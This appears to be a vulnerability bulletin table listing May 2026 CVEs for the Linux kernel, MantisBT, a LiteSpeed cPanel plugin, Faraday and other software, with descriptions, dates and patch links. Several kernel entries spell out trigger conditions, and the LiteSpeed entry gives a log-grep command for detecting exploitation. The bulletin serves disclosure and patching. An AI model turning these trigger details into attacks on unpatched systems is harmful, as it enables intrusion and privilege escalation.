| Jaspersoft--JasperReports Library Community Edition | Java Deserialisation Vulnerability in Jaspersoft Reports Library leads to Remote Code Execution (RCE), potentially allowing code execution on the affected system. | 2026-05-19 | not yet calculated | CVE-2026-6009 | https://community.jaspersoft.com/advisories/jaspersoft-security-advisory-may-19-2026-jaspersoft-library-cve-2026-6009-r11/ |
| JJNAPIORK--Catalyst::Plugin::Authentication | Catalyst::Plugin::Authentication versions through 0.10024 for Perl are susceptible to timing attacks. These versions use Perl's built-in eq comparison. Discrepancies in timing could be used to guess the underlying hash or password. | 2026-05-21 | not yet calculated | CVE-2026-5091 | https://metacpan.org/release/ETHER/Catalyst-Plugin-Authentication-0.10_025/changes https://github.com/perl-catalyst/Catalyst-Plugin-Authentication/commit/b0515f492257438cf07082acf1e10d06e8088a5e.patch |
| LalanaChami--Pharmacy Management System | The LalanaChami Pharmacy Management System (commit 5c3d028) allows unauthenticated remote attackers to escalate privileges by self-assigning an administrative role during registration. The /api/user/signup endpoint fails to validate the role parameter in the request body. | 2026-05-19 | not yet calculated | CVE-2026-31070 | https://github.com/LalanaChami/Pharmacy-Mangment-System/blob/5c3d02888631166649856f71d542387114b3010b/backend/routes/user.js#L16 https://gist.github.com/nedlir/22bf6d1a3a07209be3e343744bc81d51 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Limit the maximum server registration per node Current code does no bound checking on the number of servers added per node. A malicious client can flood NEW_SERVER messages and exhaust memory. Fix this issue by limiting the maximum number of server registrations to 256 per node. If the NEW_SERVER message is received for an old port, then don't restrict it as it will get replaced. While at it, also rate limit the error messages in the failure path of qrtr_ns_worker(). Note that the limit of 256 is chosen based on the current platform requirements. If requirement changes in the future, this limit can be increased. | 2026-05-19 | not yet calculated | CVE-2026-43491 | https://git.kernel.org/stable/c/e6f6cd501fb54060940a6eb3f4103eeb5e426ae7 https://git.kernel.org/stable/c/3efaad55cad1ded429e3a873bfece389058a526b https://git.kernel.org/stable/c/35fb4a0c077c5d1049c2628b769e0a1b1e65df0d https://git.kernel.org/stable/c/868202aa2adae427060a42d5bd663b4d782ec02c https://git.kernel.org/stable/c/d5ee2ff98322337951c56398e79d51815acbf955 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib/crypto: mpi: Fix integer underflow in mpi_read_raw_from_sgl() Yiming reports an integer underflow in mpi_read_raw_from_sgl() when subtracting "lzeros" from the unsigned "nbytes". For this to happen, the scatterlist "sgl" needs to occupy more bytes than the "nbytes" parameter and the first "nbytes + 1" bytes of the scatterlist must be zero. Under these conditions, the while loop iterating over the scatterlist will count more zeroes than "nbytes", subtract the number of zeroes from "nbytes" and cause the underflow. When commit 2d4d1eea540b ("lib/mpi: Add mpi sgl helpers") originally introduced the bug, it couldn't be triggered because all callers of mpi_read_raw_from_sgl() passed a scatterlist whose length was equal to "nbytes". However since commit 63ba4d67594a ("KEYS: asymmetric: Use new crypto interface without scatterlists"), the underflow can now actually be triggered. When invoking a KEYCTL_PKEY_ENCRYPT system call with a larger "out_len" than "in_len" and filling the "in" buffer with zeroes, crypto_akcipher_sync_prep() will create an all-zero scatterlist used for both the "src" and "dst" member of struct akcipher_request and thereby fulfil the conditions to trigger the bug: sys_keyctl() keyctl_pkey_e_d_s() asymmetric_key_eds_op() software_key_eds_op() crypto_akcipher_sync_encrypt() crypto_akcipher_sync_prep() crypto_akcipher_encrypt() rsa_enc() mpi_read_raw_from_sgl() To the user this will be visible as a DoS as the kernel spins forever, causing soft lockup splats as a side effect. Fix it. | 2026-05-19 | not yet calculated | CVE-2026-43492 | https://git.kernel.org/stable/c/2aa77a18dc7f2670497fe3ee5acbeda0b57659e5 https://git.kernel.org/stable/c/26d3a97ad46c7a9226ec04d4bf35bd4998a97d16 https://git.kernel.org/stable/c/8637dfb4c1d8a7026ef681f2477c6de8b71c4003 https://git.kernel.org/stable/c/30e513e755bb381afce6fb57cdc8694136193f22 https://git.kernel.org/stable/c/8c2f1288250a90a4b5cabed5d888d7e3aeed4035 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/rds: reset op_nents when zerocopy page pin fails When iov_iter_get_pages2() fails in rds_message_zcopy_from_user(), the pinned pages are released with put_page(), and rm->data.op_mmp_znotifier is cleared. But we fail to properly clear rm->data.op_nents. Later when rds_message_purge() is called from rds_sendmsg() the cleanup loop iterates over the incorrectly non zero number of op_nents and frees them again. Fix this by properly resetting op_nents when it should be in rds_message_zcopy_from_user(). | 2026-05-21 | not yet calculated | CVE-2026-43494 | https://git.kernel.org/stable/c/9115669faedccdda100428e2d26fd0aac8c50799 https://git.kernel.org/stable/c/0bbbff00a15b1df2cac9014d6cf4b6890f473353 https://git.kernel.org/stable/c/640e37f58f991546a87540d067279c2c1fa9fe51 https://git.kernel.org/stable/c/290e833d1acb1093bc121fcdc97f5e6161157479 https://git.kernel.org/stable/c/e174929793195e0cd6a4adb0cad731b39f9019b4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: wwan: t7xx: validate port_count against message length in t7xx_port_enum_msg_handler t7xx_port_enum_msg_handler() uses the modem-supplied port_count field as a loop bound over port_msg->data[] without checking that the message buffer contains sufficient data. A modem sending port_count=65535 in a 12-byte buffer triggers a slab-out-of-bounds read of up to 262140 bytes. Add a sizeof(*port_msg) check before accessing the port message header fields to guard against undersized messages. Add a struct_size() check after extracting port_count and before the loop. In t7xx_parse_host_rt_data(), guard the rt_feature header read with a remaining-buffer check before accessing data_len, validate feat_data_len against the actual remaining buffer to prevent OOB reads and signed integer overflow on offset. Pass msg_len from both call sites: skb->len at the DPMAIF path after skb_pull(), and the validated feat_data_len at the handshake path. | 2026-05-21 | not yet calculated | CVE-2026-43495 | https://git.kernel.org/stable/c/f94450ce5053b36002995b72d1fa1db3bb08c5bf https://git.kernel.org/stable/c/9855e063e063158cc5bded576382599dc3133202 https://git.kernel.org/stable/c/2b56d7903ab804481f5233a259d5f341e9fd513c https://git.kernel.org/stable/c/dd4f4c93c1488d7100b9964f2da4c8b3c29652f1 https://git.kernel.org/stable/c/0e7c074cfcd9bd93765505f9eb8b42f03ed2a744 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_red: Replace direct dequeue call with peek and qdisc_dequeue_peeked When red qdisc has children (eg qfq qdisc) whose peek() callback is qdisc_peek_dequeued(), we could get a kernel panic. When the parent of such qdiscs (eg illustrated in patch #3 as tbf) wants to retrieve an skb from its child (red in this case), it will do the following: 1a. do a peek() - and when sensing there's an skb the child can offer, then - the child in this case(red) calls its child's (qfq) peek. qfq does the right thing and will return the gso_skb queue packet. Note: if there wasn't a gso_skb entry then qfq will store it there. 1b. invoke a dequeue() on the child (red). And herein lies the problem. - red will call the child's dequeue() which will essentially just try to grab something of qfq's queue. [ 78.667668][ T363] KASAN: null-ptr-deref in range [0x0000000000000048-0x000000000000004f] [ 78.667927][ T363] CPU: 1 UID: 0 PID: 363 Comm: ping Not tainted 7.1.0-rc1-00033-g46f74a3f7d57-dirty #790 PREEMPT(full) [ 78.668263][ T363] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 [ 78.668486][ T363] RIP: 0010:qfq_dequeue+0x446/0xc90 [sch_qfq] [ 78.668718][ T363] Code: 54 c0 e8 dd 90 00 f1 48 c7 c7 e0 03 54 c0 48 89 de e8 ce 90 00 f1 48 8d 7b 48 b8 ff ff 37 00 48 89 fa 48 c1 e0 2a 48 c1 ea 03 <80> 3c 02 00 74 05 e8 ef a1 e1 f1 48 8b 7b 48 48 8d 54 24 58 48 8d [ 78.669312][ T363] RSP: 0018:ffff88810de573e0 EFLAGS: 00010216 [ 78.669533][ T363] RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 [ 78.669790][ T363] RDX: 0000000000000009 RSI: 0000000000000004 RDI: 0000000000000048 [ 78.670044][ T363] RBP: ffff888110dc4000 R08: ffffffffb1b0885a R09: fffffbfff6ba9078 [ 78.670297][ T363] R10: 0000000000000003 R11: ffff888110e31c80 R12: 0000001880000000 [ 78.670560][ T363] R13: ffff888110dc4150 R14: ffff888110dc42b8 R15: 0000000000000200 [ 78.670814][ T363] FS: 00007f66a8f09c40(0000) GS:ffff888163428000(0000) knlGS:0000000000000000 [ 78.671110][ T363] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 78.671324][ T363] CR2: 000055db4c6a30a8 CR3: 000000010da67000 CR4: 0000000000750ef0 [ 78.671585][ T363] PKRU: 55555554 [ 78.671713][ T363] Call Trace: [ 78.671843][ T363] <TASK> [ 78.671936][ T363] ? __pfx_qfq_dequeue+0x10/0x10 [sch_qfq] [ 78.672148][ T363] ? __pfx__printk+0x10/0x10 [ 78.672322][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.672496][ T363] ? lockdep_hardirqs_on_prepare+0xa8/0x1a0 [ 78.672706][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.672875][ T363] ? trace_hardirqs_on+0x19/0x1a0 [ 78.673047][ T363] red_dequeue+0x65/0x270 [sch_red] [ 78.673217][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.673385][ T363] tbf_dequeue.cold+0xb0/0x70c [sch_tbf] [ 78.673566][ T363] __qdisc_run+0x169/0x1900 The right thing to do in #1b is to grab the skb off gso_skb queue. This patchset fixes that issue by changing #1b to use qdisc_dequeue_peeked() method instead. | 2026-05-21 | not yet calculated | CVE-2026-43496 | https://git.kernel.org/stable/c/36aa34f42cb6842cf371f3a2d3e855d24fd57a50 https://git.kernel.org/stable/c/ce051eede433f876d322ac3550a36a3c6fc4c231 https://git.kernel.org/stable/c/8d09618840b99ef00154d3e731ce9b11e096196d https://git.kernel.org/stable/c/587dcf970a525f543d8b5855d9f37a4ca97b76ef https://git.kernel.org/stable/c/458d5615272d3de535748342eb68ca492343048c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: udlfb: add vm_ops to dlfb_ops_mmap to prevent use-after-free dlfb_ops_mmap() uses remap_pfn_range() to map vmalloc framebuffer pages to userspace but sets no vm_ops on the VMA. This means the kernel cannot track active mmaps. When dlfb_realloc_framebuffer() replaces the backing buffer via FBIOPUT_VSCREENINFO, existing mmap PTEs are not invalidated. On USB disconnect, dlfb_ops_destroy() calls vfree() on the old pages while userspace PTEs still reference them, resulting in a use-after-free: the process retains read/write access to freed kernel pages. Add vm_operations_struct with open/close callbacks that maintain an atomic mmap_count on struct dlfb_data. In dlfb_realloc_framebuffer(), check mmap_count and return -EBUSY if the buffer is currently mapped, preventing buffer replacement while userspace holds stale PTEs. Tested with PoC using dummy_hcd + raw_gadget USB device emulation. | 2026-05-21 | not yet calculated | CVE-2026-43497 | https://git.kernel.org/stable/c/4f312c30f0368e8d2a76aa650dff73f23490b5e7 https://git.kernel.org/stable/c/18dd358de72d57993422cbb5dfb29ccd74efe192 https://git.kernel.org/stable/c/da9b065cedfd3b574f229d5be594e6aa47a27ae6 https://git.kernel.org/stable/c/a2c53a3822ee26e8d758071815b9ed3bf6669fc1 https://git.kernel.org/stable/c/8de779dc40d35d39fa07387b6f921eb11df0f511 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Disallow re-exporting imported GEM objects Prevent re-exporting of imported GEM buffers by adding a custom prime_handle_to_fd callback that checks if the object is imported and returns -EOPNOTSUPP if so. Re-exporting imported GEM buffers causes loss of buffer flags settings, leading to incorrect device access and data corruption. | 2026-05-21 | not yet calculated | CVE-2026-43498 | https://git.kernel.org/stable/c/3756043dd695bba34cc728cdc5688dcb49ac8043 https://git.kernel.org/stable/c/7dd57d7a6350770dfc283287125c409e995200e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rtmutex: Use waiter::task instead of current in remove_waiter() remove_waiter() is used by the slowlock paths, but it is also used for proxy-lock rollback in rt_mutex_start_proxy_lock() when invoked from futex_requeue(). In the latter case waiter::task is not current, but remove_waiter() operates on current for the dequeue operation. That results in several problems: 1) the rbtree dequeue happens without waiter::task::pi_lock being held 2) the waiter task's pi_blocked_on state is not cleared, which leaves a dangling pointer primed for UAF around. 3) rt_mutex_adjust_prio_chain() operates on the wrong top priority waiter task Use waiter::task instead of current in all related operations in remove_waiter() to cure those problems. [ tglx: Fixup rt_mutex_adjust_prio_chain(), add a comment and amend the changelog ] | 2026-05-21 | not yet calculated | CVE-2026-43499 | https://git.kernel.org/stable/c/8a1fc8d698ac5e5916e3082a0f74450d71f9611f https://git.kernel.org/stable/c/6d52dfcb2a5db86e346cf51f8fcf2071b8085166 https://git.kernel.org/stable/c/3fb7394a837740770f0d6b4b30567e60786a63f2 https://git.kernel.org/stable/c/88614876370aac8ad1050ad785a4c095ba17ac11 https://git.kernel.org/stable/c/3bfdc63936dd4773109b7b8c280c0f3b5ae7d349 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: rpl: reserve mac_len headroom when recompressed SRH grows ipv6_rpl_srh_rcv() decompresses an RFC 6554 Source Routing Header, swaps the next segment into ipv6_hdr->daddr, recompresses, then pulls the old header and pushes the new one plus the IPv6 header back. The recompressed header can be larger than the received one when the swap reduces the common-prefix length the segments share with daddr (CmprI=0, CmprE>0, seg[0][0] != daddr[0] gives the maximum +8 bytes). pskb_expand_head() was gated on segments_left == 0, so on earlier segments the push consumed unchecked headroom. Once skb_push() leaves fewer than skb->mac_len bytes in front of data, skb_mac_header_rebuild()'s call to: skb_set_mac_header(skb, -skb->mac_len); will store (data - head) - mac_len into the u16 mac_header field, which wraps to ~65530, and the following memmove() writes mac_len bytes ~64KiB past skb->head. A single AF_INET6/SOCK_RAW/IPV6_HDRINCL packet over lo with a two segment type-3 SRH (CmprI=0, CmprE=15) reaches headroom 8 after one pass; KASAN reports a 14-byte OOB write in ipv6_rthdr_rcv. Fix this by expanding the head whenever the remaining room is less than the push size plus mac_len, and request that much extra so the rebuilt MAC header fits afterwards. | 2026-05-21 | not yet calculated | CVE-2026-43501 | https://git.kernel.org/stable/c/8e8be63465a5e80394c70324603dfea1bfdad48f https://git.kernel.org/stable/c/4babc2d9fda2df43823b85d08a0180b68f1b0854 https://git.kernel.org/stable/c/c261d07a80576dc8ccf394ef8f074f8c67a06b37 https://git.kernel.org/stable/c/7398ebefbfd4f8a31d4f665a4213302fa995494b https://git.kernel.org/stable/c/9e6bf146b55999a095bb14f73a843942456d1adc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/rds: handle zerocopy send cleanup before the message is queued A zerocopy send can fail after user pages have been pinned but before the message is attached to the sending socket. The purge path currently infers zerocopy state from rm->m_rs, so an unqueued message can be cleaned up as if it owned normal payload pages. However, zerocopy ownership is really determined by the presence of op_mmp_znotifier, regardless of whether the message has reached the socket queue. Capture op_mmp_znotifier up front in rds_message_purge() and use it as the cleanup discriminator. If the message is already associated with a socket, keep the existing completion path. Otherwise, drop the pinned page accounting directly and release the notifier before putting the payload pages. This keeps early send failure cleanup consistent with the zerocopy lifetime rules without changing the normal queued completion path. | 2026-05-21 | not yet calculated | CVE-2026-43502 | https://git.kernel.org/stable/c/21d70744e6d3bbf9293aa1ee6fba7c53ad75275e https://git.kernel.org/stable/c/3abc8983b2bae3f487f77d9da5527d7d6b210d46 https://git.kernel.org/stable/c/14ef6fd18db2494098b21e0471bf27a1d8e9993e https://git.kernel.org/stable/c/0f5c185fc79a59ee9991234dd6d2a3e5afa6e75b https://git.kernel.org/stable/c/44b550d88b267320459d518c0743a241ab2108fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: skbuff: propagate shared-frag marker through frag-transfer helpers Two frag-transfer helpers (__pskb_copy_fclone() and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in skb_shinfo()->flags when moving frags from source to destination. __pskb_copy_fclone() defers the rest of the shinfo metadata to skb_copy_header() after copying frag descriptors, but that helper only carries over gso_{size,segs, type} and never touches skb_shinfo()->flags; skb_shift() moves frag descriptors directly and leaves flags untouched. As a result, the destination skb keeps a reference to the same externally-owned or page-cache-backed pages while reporting skb_has_shared_frag() as false. The mismatch is harmful in any in-place writer that uses skb_has_shared_frag() to decide whether shared pages must be detoured through skb_cow_data(). ESP input is one such writer (esp4.c, esp6.c), and a single nft 'dup to <local>' rule -- or any other nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d skb in esp_input() with the marker stripped, letting an unprivileged user write into the page cache of a root-owned read-only file via authencesn-ESN stray writes. Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors were actually moved from the source. skb_copy() and skb_copy_expand() share skb_copy_header() too but linearize all paged data into freshly allocated head storage and emerge with nr_frags == 0, so skb_has_shared_frag() returns false on its own; they need no change. The same omission exists in skb_gro_receive() and skb_gro_receive_list(). The former moves the incoming skb's frag descriptors into the accumulator's last sub-skb via two paths (a direct frag-move loop and the head_frag + memcpy path); the latter chains the incoming skb whole onto p's frag_list. Downstream skb_segment() reads only skb_shinfo(p)->flags, and skb_segment_list() reuses each sub-skb's shinfo as the nskb -- both p and lp must carry the marker. The same omission also exists in tcp_clone_payload(), which builds an MTU probe skb by moving frag descriptors from skbs on sk_write_queue into a freshly allocated nskb. The helper falls into the same family and warrants the same fix for consistency; no TCP TX-side in-place writer is currently known to reach a user page through this gap, but a future consumer depending on the marker would regress silently. The same omission exists in skb_segment(): the per-iteration flag merge takes only head_skb's flag, and the inner switch that rebinds frag_skb to list_skb on head_skb-frags exhaustion does not fold the new frag_skb's flag into nskb. Fold frag_skb's flag at both sites so segments drawing frags from frag_list members carry the marker. | 2026-05-23 | not yet calculated | CVE-2026-43503 | https://git.kernel.org/stable/c/fbeab9555564a1b98e8582cd106dfe46c4606991 https://git.kernel.org/stable/c/179f1852bdedc300e373e807cc102cd81feff196 https://git.kernel.org/stable/c/12401fcfb01f53ccc63ab0a3246570fe8f3105ee https://git.kernel.org/stable/c/989214c66884d70716d83dc1d0bf5e16287bf349 https://git.kernel.org/stable/c/fc6eb39c55e97df2f94ad974b8a5bbcd019da2c8 https://git.kernel.org/stable/c/ff375cc75f9167168db38e0464a482d5fbc8d81d https://git.kernel.org/stable/c/9bc9d6d6967a2239aa57af2aa53554eddd640d20 https://git.kernel.org/stable/c/48f6a5356a33dd78e7144ae1faef95ffc990aae0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: skbuff: preserve shared-frag marker during coalescing skb_try_coalesce() can attach paged frags from @from to @to. If @from has SKBFL_SHARED_FRAG set, the resulting @to skb can contain the same externally-owned or page-cache-backed frags, but the shared-frag marker is currently lost. That breaks the invariant relied on by later in-place writers. In particular, ESP input checks skb_has_shared_frag() before deciding whether an uncloned nonlinear skb can skip skb_cow_data(). If TCP receive coalescing has moved shared frags into an unmarked skb, ESP can see skb_has_shared_frag() as false and decrypt in place over page-cache backed frags. Propagate SKBFL_SHARED_FRAG when skb_try_coalesce() transfers paged frags. The tailroom copy path does not need the marker because it copies bytes into @to's linear data rather than transferring frag descriptors. | 2026-05-23 | not yet calculated | CVE-2026-46300 | https://git.kernel.org/stable/c/3599e6b3cc1ada96883d496a50a210d3afbb6987 https://git.kernel.org/stable/c/2f2b16022a2e10ca7bccfb98db5ed2ec0f72641c https://git.kernel.org/stable/c/9d3e5fd19fe1063bf607219e8562fbd567b8e8d5 https://git.kernel.org/stable/c/78bf6b6bb19541d19fbda6242e7cfe2c682763c0 https://git.kernel.org/stable/c/760e1addc27ba1a7beb4a0a7e8b3e9ec49e7a34e https://git.kernel.org/stable/c/3bd9e113d50034db99d7ef69fd8e5242d15e414a https://git.kernel.org/stable/c/3884358a9286b17f389a72b1426fc4547c23c111 https://git.kernel.org/stable/c/f84eca5817390257cef78013d0112481c503b4a3 |
| LiteSpeed Technologies--cPanel Plugin | LiteSpeed User-End cPanel Plugin before 2.4.5 allows privilege escalation (possibly to root), as exploited in the wild in May 2026. Detection is best done via a command line of grep -rE "cpanel_jsonapi_func=redisAble" /var/cpanel/logs /usr/local/cpanel/logs/ 2>/dev/null in Bash. If you get no output, you have not been hit with exploitation of the vulnerability. If there is output, we recommend you examine the IP addresses in the list, determine if they are valid IP addresses, and if not, block them. To determine damage done, examine the system logs for use by the detected IP addresses. The issue is related to mishandling of Redis enable/disable features. The recommended minimum version is 2.4.7. | 2026-05-21 | not yet calculated | CVE-2026-48172 | https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/cpanel https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/release-log https://blog.litespeedtech.com/2026/05/21/security-update-for-litespeed-cpanel-plugin/ |
| lostisland--faraday | Faraday is an HTTP client library abstraction layer that provides a common interface over many adapters. Versions 2.0.0 through 2.14.1 still allow protocol-relative host override when the request target is passed as a URI object (rather than a String) to Faraday::Connection#build_exclusive_url. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and enables off-host request forgery: a request built from a fixed-base Faraday::Connection can be redirected to an attacker-controlled host, forwarding connection-scoped values such as Authorization headers and default query parameters. This issue has been fixed in version 2.14.3. | 2026-05-19 | not yet calculated | CVE-2026-33637 | https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484 https://github.com/advisories/GHSA-33mh-2634-fwr2 |
| LXQt--PCManFM-Qt | An issue was discovered in all versions of PCManFM-Qt starting from 1.1.0. When a regular file's path is passed as a URI in an org.freedesktop.FileManager1.ShowFolders D-Bus method call, PCManFM-Qt delegates to a different program (based on the file type) without user confirmation. This could be used to achieve code execution or circumvent network namespace restrictions. NOTE: those outcomes are potentially unwanted by most users; however, the behavior of the product does comply with the applicable specification, and a simplistic solution (ensuring that the URI does not name a regular file) may have adverse consequences for I/O. | 2026-05-22 | not yet calculated | CVE-2026-48700 | https://www.openwall.com/lists/oss-security/2026/05/20/2 https://www.openwall.com/lists/oss-security/2026/05/19/1 https://github.com/lxqt/pcmanfm-qt/releases |
| M-Files Corporation--M-Files Server | Denial-of-service condition in M-Files Server versions before 26.5.16015.0, before 26.2 LTS, and before 25.8 LTS SR3 allows an authenticated user to cause the MFserver process to crash. | 2026-05-18 | not yet calculated | CVE-2026-0983 | https://empower.m-files.com/security-advisories/CVE-2026-0983 |
| mailcow--mailcow-dockerized | mailcow-dockerized contains a stored cross-site scripting vulnerability in the administrator Queue Manager. The Queue Manager fetches mail queue entries from /api/v1/get/mailq/all, copies server-controlled Postfix queue fields into DataTables rows, and renders several of those fields as HTML without adequate output encoding. This issue affects mailcow-dockerized: 2026-03b. | 2026-05-20 | not yet calculated | CVE-2026-7460 | https://fluidattacks.com/advisories/mojabi https://github.com/mailcow/mailcow-dockerized |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.0 and 2.28.1 allow a low-privileged authenticated user assigned the "add_profile_threshold" permission to create a global profile despite not having manage_global_profile_threshold, by tampering with the user_id parameter in a valid profile creation request. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-33052 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-68w5-w573-q2r8 https://github.com/mantisbt/mantisbt/commit/3f952e68fa864e0e60abc3e84adecf3cfa84c75e https://mantisbt.org/bugs/view.php?id=36974 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior have a Privilege Escalation vulnerability where insufficient access control checks in ProjectUsersAddCommand (manage_proj_user_add.php) allow users having manage_project_threshold access level (manager by default) to grant project-level administrator access to any user (including themselves) in any Project they have manager rights in. The normal project-user add form restricts the selectable access levels to the actor's own project role or below. However, the backend handler still accepts a forged higher access_level value and writes it. The consequences of the privilege escalation are slight, as having administrator access at Project level is effectively not very different from being manager, and it does not actually give administrator privileges on the whole MantisBT instance. In particular, it does not let the upgraded user delete the Project or grant them any access to global administrative functions such as managing Users, Projects, Plugins, Custom Fields, etc. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34390 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-frf7-jhp9-jxm6 https://github.com/mantisbt/mantisbt/commit/69e0180f180ed5acf48a8d281a73683a7bf32461 https://mantisbt.org/bugs/view.php?id=36995 https://mantisbt.org/bugs/view.php?id=37002 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior contain a Stored XSS vulnerability. When cloning an issue originating from a Project other than the current one, the clone form (bug_report_page.php) prepends the source Project name before the category selector without proper escaping, allowing an attacker to inject HTML if they can set the Project's name (which typically requires manager or administrator access level). This issue has been resolved in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34463 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-fvjf-68wh-rwp2 https://github.com/mantisbt/mantisbt/commit/df22697ae497ddd93f3d9132fdf4979db8d081cd https://mantisbt.org/bugs/view.php?id=36986 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior are vulnerable to Authorization Bypass through the private issue monitoring feature. Using a crafted POST request to bug_monitor_add.php, a user with project-level access can add themselves as a monitor for a private issue they do not have access to. Despite displaying an Access Denied error, the application accepts the request and creates a monitor relationship for the private issue. Direct access to the private issue remains blocked, but the user will receive email notifications for updates, leading to disclosure of the private issue's metadata and content. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34579 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-ggw7-9675-6v4v https://github.com/mantisbt/mantisbt/commit/0a93267deba445fb9d15250c16e6fdb1246ffa65 https://mantisbt.org/bugs/view.php?id=36975 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior permit a user to list and download their own attachments from an Issue created by another user even after it becomes private, bypassing read access revocation. The loss of confidentiality caused by this vulnerability is minimal, considering that only attachments previously uploaded by the user themselves remain accessible. This issue has been fixed in version 2.82.2. | 2026-05-19 | not yet calculated | CVE-2026-34744 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-rmp5-5jj7-gmvf https://github.com/mantisbt/mantisbt/commit/de7bdeec36de066235e38a77bf056917d951c84d https://mantisbt.org/bugs/view.php?id=36977 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow a bugnote author to access the note's Revisions page after losing access to the parent private issue. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34970 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-crmx-4p49-46m2 https://github.com/mantisbt/mantisbt/commit/71df1f67e05b2050cd4bd87839e6cc13747cf03f https://mantisbt.org/bugs/view.php?id=36978 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.11.0 through 2.28.1 allow any authenticated user to inject arbitrary HTML by updating their account's font family. Upon exploitation, an XSS payload would be reflected on every MantisBT page. Leveraging another vulnerability (CSP bypass, see GHSA-9c3j-xm6v-j7j3), the attacker could achieve account takeover. This issue has been fixed in version 2.28.2. | 2026-05-22 | not yet calculated | CVE-2026-40596 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-j3v9-553h-x28j https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3 https://github.com/mantisbt/mantisbt/commit/9e8409cdd979eba86ef532756fc47c1d8112d22d https://mantisbt.org/bugs/view.php?id=37011 https://mantisbt.org/bugs/view.php?id=37016 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.28.1 and below, given any pre-existing XSS / HTML injection vulnerability, an attacker can bypass the Content Security Policy's script-src directive by uploading a crafted attachment to any issue that, when accessed via the file_download.php link, will be downloaded with a valid JavaScript MIME type resulting in script execution. The uploaded payload must be sniffed as a valid JavaScript MIME type by PHP finfo (see file_create_finfo() API function). Non-JavaScript MIME types will not get imported in a <script> tag by the browser, due to response header X-Content-Type-Options being set to nosniff, which requires all imported JavaScript files to be a valid JavaScript MIME type. This issue has been fixed in version 2.28.2. | 2026-05-22 | not yet calculated | CVE-2026-40597 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3 https://github.com/mantisbt/mantisbt/commit/9e3bee2e7b909f4e3596985892b8bc8bee9e0bfe https://mantisbt.org/bugs/view.php?id=37016 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.28.1 and below, improper escaping of the redirection page (retrieved from the request's Referer header) allows an attacker to inject HTML. While this is generally not directly actionable as modern browsers will URL-encode special characters, on some specific server configurations this could poison the cache, leading to cross-site scripting. This issue has been fixed in version 2.28.2. | 2026-05-22 | not yet calculated | CVE-2026-40598 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-6jh4-47v2-4g37 https://github.com/mantisbt/mantisbt/commit/b1ebc57763f104eb5f541b7b4d1ce6948168abd9 https://mantisbt.org/bugs/view.php?id=37017 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.11.0 through 2.28.1, a Stored XSS vulnerability is caused by incorrect escaping of a saved filter's owner, allowing an attacker to inject arbitrary HTML on systems where $g_show_user_realname = ON. Note that by default, only users with Manager access level or above can save their filters publicly. This issue has been fixed in version 2.28.2. If developers are unable to update immediately, they can work around this issue by preventing display of users' real names (set $g_show_user_realname = OFF; in configuration), and restricting the ability to store filters (set $g_stored_query_create_threshold / $g_stored_query_create_shared_threshold to NOBODY). | 2026-05-22 | not yet calculated | CVE-2026-40607 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-f633-865q-2mhh https://github.com/mantisbt/mantisbt/commit/44f490bcf20fd491c1b8f3fc9dd041d8c2a30010 https://mantisbt.org/bugs/view.php?id=37015 |
